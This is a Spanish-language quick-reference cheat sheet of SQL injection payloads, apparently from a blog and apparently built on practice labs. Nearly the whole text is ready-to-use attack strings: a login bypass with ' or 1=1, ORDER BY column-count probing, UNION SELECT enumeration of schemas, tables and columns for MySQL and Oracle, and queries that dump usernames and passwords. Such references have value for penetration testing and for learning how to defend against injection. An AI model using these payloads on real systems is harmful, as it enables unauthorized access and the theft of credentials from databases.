En este post recopilamos ejemplos y técnicas de inyección SQL (SQLi) directos al grano, pensados como referencia rápida. Salvo que se indique lo contrario, los payloads usan sintaxis de MySQL (group_concat, database(), information_schema); al final hay una sección específica para Oracle.
El objetivo es manipular la condición del WHERE para que siempre sea verdadera (`1=1`), de modo que la consulta retorne todos los registros de la tabla. El `-- -` final comenta el resto de la consulta original: en MySQL `--` necesita un espacio después, y el guion extra evita que ese espacio se pierda si la aplicación recorta la entrada.
-- Authentication bypass: the leading quote closes the string literal, OR 1=1 makes the
-- WHERE clause always true, and "-- -" comments out whatever follows the injection point.
' or 1=1-- -
Probamos el payload en el formulario de autenticación (campo de usuario o de contraseña). Si el inicio de sesión tiene éxito, la entrada se está concatenando en la consulta sin parametrizar y el resto de técnicas de este post son aplicables.
-- Bare truncation: closes the literal and comments out the rest of the query
-- (for example the password check that follows the username).
'-- -
-- Column-count discovery: raise n until ORDER BY fails; the last value that
-- works is the number of columns the original SELECT returns.
' order by (n_columnas)-- -
' ORDER BY 2-- -
-- With the count known (2 here), UNION a row of NULL placeholders and swap one
-- of them for a marker string to see which column is reflected in the page.
-- NULL is used because it is compatible with every column type.
' UNION SELECT NULL,'Probando'-- -
' UNION SELECT 'Probando',NULL-- -
Los NULL son marcadores de posición, uno por columna (NULL es compatible con cualquier tipo de dato). Se sustituye uno de ellos por una cadena reconocible para descubrir qué columna se refleja en la página; esa columna es la que se usará para extraer los datos. Ejemplo con tres columnas:
-- Three-column target: NULL placeholders first, then a marker string in one
-- position at a time to find the reflected column.
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT 'VkItMD',NULL,NULL-- -
-- Enumerate databases (MySQL: information_schema.schemata), one row per schema.
' UNION SELECT NULL,schema_name from information_schema.schemata-- -
-- group_concat (MySQL-specific) collapses every row into the single reflected
-- column; output is capped by group_concat_max_len (1024 by default), so long
-- lists may be truncated.
' UNION SELECT NULL,group_concat(schema_name) from information_schema.schemata-- -
-- Name of the database the vulnerable query runs against.
' UNION SELECT NULL,database()-- -
-- Credential dump from an explicitly qualified table (schema.table).
' UNION SELECT NULL, group_concat(username,':',password) from tienda.users-- -
# En donde tienda es la base de datos que está en uso (la obtenida con database()). Al calificar la tabla como esquema.tabla se puede consultar cualquier base de datos visible para el usuario con el que conecta la aplicación, no solo la actual.
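-- Table enumeration. Without a schema filter this lists every table visible to
-- the DB user, including information_schema's own tables.
' UNION SELECT table_name,NULL from information_schema.tables-- -
-- 'public' is PostgreSQL's default schema; on MySQL filter by database() or by
-- a schema name obtained from information_schema.schemata instead.
' UNION SELECT table_name,NULL from information_schema.tables where table_schema = 'public'-- -
-- Column enumeration; replace DB and tabla with the values found above.
' UNION SELECT column_name,NULL from information_schema.columns where table_schema = 'DB' and table_name = 'tabla'-- -
-- Credential dump, one row per user (needs both columns to be reflected).
' UNION SELECT username,password from users-- -
-- Same data collapsed into one reflected column (MySQL group_concat).
' UNION SELECT NULL,group_concat(username,':',password) from users-- -
-- Quote-free variant for when single quotes are filtered: 0x3a is the MySQL hex
-- literal for ':' and must NOT be quoted -- '0x3a' inserts the literal text
-- "0x3a" instead of a colon and defeats the purpose of the payload.
' UNION SELECT NULL,group_concat(username,0x3a,password) from users-- -
-- || concatenates on PostgreSQL and Oracle; on MySQL it is logical OR unless
-- the PIPES_AS_CONCAT SQL mode is enabled, so prefer concat()/group_concat there.
' UNION SELECT NULL,username||':'||password from users-- -
-- Portable concat(); note MySQL returns NULL if any argument is NULL.
' UNION SELECT NULL,concat(username,':',password) from users-- -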
-- Oracle section. ORDER BY probing for the column count works the same way.
' ORDER BY 2-- -
-- Oracle requires a FROM clause in every SELECT, so the NULL probe selects
-- from the built-in dummy table dual.
' UNION SELECT NULL,NULL from dual-- -
-- Oracle has no information_schema; all_tables lists the tables the current
-- user can see.
' UNION SELECT NULL,table_name from all_tables-- -
-- owner is the schema that holds each table; use it to skip Oracle's built-in
-- schemas and focus on the application's.
' UNION SELECT NULL,owner from all_tables-- -
' UNION SELECT NULL,table_name from all_tables where owner = 'PETER'-- -
-- Oracle folds unquoted identifiers to upper case, so the table name in the
-- filter must be written in upper case to match all_tab_columns.
' UNION SELECT NULL,column_name from all_tab_columns where table_name = 'USERS_VFDYAP'-- -
-- || is Oracle's string concatenation operator.
' UNION SELECT NULL,USERNAME_GTWJZC||':'||PASSWORD_TBLRSL FROM USERS_VFDYAP-- -